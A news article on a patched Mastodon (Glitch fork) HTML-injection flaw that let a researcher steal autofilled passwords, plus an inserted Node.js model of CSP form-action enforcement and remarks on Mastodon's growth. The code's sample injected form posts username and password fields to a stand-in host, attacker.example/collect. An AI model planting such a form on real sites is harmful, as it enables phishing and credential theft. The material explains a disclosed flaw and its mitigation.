Mastodon Fixes Bug That Exposed Users to Credential Theft

Photo Depicting the Mastodon iOS App

A now-patched vulnerability on the infosec.exchange Mastodon server allowed attackers to spoof a verification badge and steal users’ credentials, a PortSwigger researcher revealed on Tuesday.

Mastodon, a “decentralized social media” platform, has seen its daily users increase significantly over the past weeks in the wake of Elon Musk’s takeover of Twitter. But a bypassable HTML filter in one fork of its server software let attackers inject markup into posts, exposing users to phishing and credential theft.

PortSwigger researcher Gareth Heyes was able to steal Mastodon users’ passwords by chaining an HTML filter bypass with Google Chrome’s password autofill feature.

Heyes injected markup that rendered a form styled to look like the Mastodon toolbar inside a post. Chrome’s autofill populated the form’s fields with the viewer’s saved credentials, and clicking the fake toolbar submitted them to an external server.

After receiving the report, the maintainers released an update addressing the issue. The fix is available on GitHub.

Spoofed Password Forms

Heyes could steal passwords from Mastodon users because of a bug in Glitch, a fork of the Mastodon server software that powers infosec.exchange. He released a proof-of-concept report on Tuesday, including a video showing how he exploited the flaw.

Heyes first noticed that including the emoji shortcode “:verified:” in his profile rendered a fake “blue tick” next to his Mastodon username. Digging further, he realized he could bypass Mastodon’s HTML filter and inject new markup into the site.

Mastodon’s “strict” Content Security Policy (CSP) stopped him from executing injected scripts, but it did not restrict where forms could submit. Heyes therefore injected fake login forms; Chrome’s autofill populated them with the user’s saved password without any further interaction, and submitting the form sent that password off-site.

Ultimately, Heyes could capture users’ credentials as soon as they clicked the fake Mastodon toolbar he had injected.

“Add the PoC code into the post text area and hit publish – [the] user sees [the] post and clicks on what they think is a Mastodon toolbar. Credentials are sent to an external server,” he told PortSwigger’s news site, The Daily Swig. “In a real attack the credentials will be stored and the user redirected back to the site.”

According to Heyes, two mitigations would prevent attacks of this kind: a CSP “form-action directive”, which restricts the destinations to which forms on a page may submit, and browsers requiring “user interaction when filling in passwords” rather than autofilling them silently.
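The following is an added example, not code from the article, from Heyes’ proof of concept, or from Mastodon or Glitch. It is a small Node.js model of how a browser enforces the CSP form-action directive, used to show why the first mitigation above would have blocked the exfiltration even though scripts were already locked down. The injected form, the placeholder hostname attacker.example, and both CSP headers are constructed for illustration; Mastodon’s real header is not reproduced here.

```javascript
// Added example (not from the article, the PoC, Mastodon or Glitch): a
// simplified model of how a browser enforces the CSP form-action directive.
// It checks where an injected form is allowed to submit under two policies.

// Constructed stand-in for the kind of markup the attack relies on: a form
// styled to look like a toolbar whose action points at an attacker host.
// "attacker.example" is a placeholder, not a hostname from the report.
const INJECTED_FORM = `
<div class="status-content">
  <form action="https://attacker.example/collect" method="POST" class="fake-toolbar">
    <input name="username" autocomplete="username">
    <input name="password" type="password" autocomplete="current-password">
    <button type="submit">Boost</button>
  </form>
</div>`;

// Two constructed policies: both block inline scripts, which is what stopped
// Heyes from running JavaScript, but only the second restricts form targets.
const WEAK_CSP = "default-src 'self'; script-src 'self'; object-src 'none'";
const HARDENED_CSP = `${WEAK_CSP}; form-action 'self'`;

// Pull every form action out of an HTML fragment (attribute quoted with " or ').
function extractFormActions(html) {
  const re = /<form\b[^>]*\baction\s*=\s*(?:"([^"]*)"|'([^']*)')/gi;
  const actions = [];
  let m;
  while ((m = re.exec(html)) !== null) actions.push(m[1] ?? m[2]);
  return actions;
}

// Parse a CSP header into a map of directive name -> source list.
function parseCsp(header) {
  const directives = new Map();
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length > 0) directives.set(tokens[0].toLowerCase(), tokens.slice(1));
  }
  return directives;
}

function defaultPort(protocol) {
  return protocol === "https:" ? "443" : protocol === "http:" ? "80" : "";
}

// Does one source expression match the target URL? Covers 'none', 'self', '*',
// scheme-only sources and host sources with optional scheme, wildcard subdomain
// and port. Path matching is omitted to keep the model short.
function sourceMatches(src, target, pageOrigin) {
  const expr = src.toLowerCase();
  if (expr === "'none'") return false;
  if (expr === "'self'") return target.origin === pageOrigin;
  if (expr === "*") return true;
  if (/^[a-z][a-z0-9+.-]*:$/.test(expr)) return target.protocol === expr;

  let scheme = null;
  let host = expr;
  const schemeEnd = host.indexOf("://");
  if (schemeEnd !== -1) {
    scheme = host.slice(0, schemeEnd + 1); // keep trailing ":" to compare with URL.protocol
    host = host.slice(schemeEnd + 3);
  }
  const slash = host.indexOf("/");
  if (slash !== -1) host = host.slice(0, slash);
  let port = null;
  const colon = host.lastIndexOf(":");
  if (colon !== -1) {
    port = host.slice(colon + 1);
    host = host.slice(0, colon);
  }

  if (scheme !== null && target.protocol !== scheme) return false;
  const targetPort = target.port || defaultPort(target.protocol);
  if (port === null) {
    if (targetPort !== defaultPort(target.protocol)) return false;
  } else if (port !== "*" && port !== targetPort) {
    return false;
  }
  if (host.startsWith("*.")) return target.hostname.endsWith(host.slice(1));
  return target.hostname === host;
}

// The browser-side decision: unlike fetch directives, form-action does NOT
// fall back to default-src, so a policy without it allows any target.
function formSubmissionAllowed(cspHeader, actionUrl, pageOrigin) {
  const directives = parseCsp(cspHeader);
  if (!directives.has("form-action")) return true;
  const target = new URL(actionUrl, pageOrigin);
  return directives.get("form-action").some((src) => sourceMatches(src, target, pageOrigin));
}

// Audit a fragment: where would each of its forms be allowed to submit?
function auditForms(html, cspHeader, pageOrigin) {
  return extractFormActions(html).map((action) => ({
    action,
    allowed: formSubmissionAllowed(cspHeader, action, pageOrigin),
  }));
}

// Stand-alone demonstration using the article's server as the page origin.
const ORIGIN = "https://infosec.exchange";
for (const [name, csp] of [["weak", WEAK_CSP], ["hardened", HARDENED_CSP]]) {
  for (const r of auditForms(INJECTED_FORM, csp, ORIGIN)) {
    console.log(`${name.padEnd(8)} form action ${r.action}: ${r.allowed ? "ALLOWED" : "blocked"}`);
  }
}
```

Under the weak policy the injected form may post to attacker.example even though no script can run, which is exactly the gap Heyes exploited; adding `form-action 'self'` confines submissions to the site’s own origin. Note that the second mitigation, requiring a user gesture before autofill, is a browser-side control and cannot be expressed in the CSP at all.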

Mastodon on the Rise

Although Mastodon has been around since 2016, it only started basking in the spotlight recently. Since October, almost 500,000 users have joined the platform.

Twitter lost around 1.3 million users between Oct. 27 and Nov. 1, according to an analysis by online behavior tracking firm Bot Sentinel.

Earlier this month, Mastodon founder Eugen Rochko said the platform has over one million active users and 1,000 new servers.

“135k (!!) users joined yesterday,” MIT associate professor Esteban Moro tweeted on Nov. 8.

“I’m going to need a logarithmic scale pretty soon,” he added, alluding to the surprising spike in Mastodon’s user base. Moro’s tweet includes a graph showing how Mastodon’s daily users climbed following Musk’s acquisition of Twitter.

While Twitter appears to be losing users at a fast pace, Musk said last week that its user base has “increased significantly” since his takeover of the company.

Are you interested in learning how to secure your online accounts and keep your passwords from falling into the hands of threat actors? We recommend using a password manager. Our article on the best password managers of 2022 contains our top picks.

Tech researcher & communications specialist
Mirza has an educational background in Global Communications and has worked in advertising, marketing, journalism and television over the years while living in several different countries. He now works to consolidate news and outreach at VPNoverview.com; in his free time he likes to work on documentary projects, read about sociology and write about world events.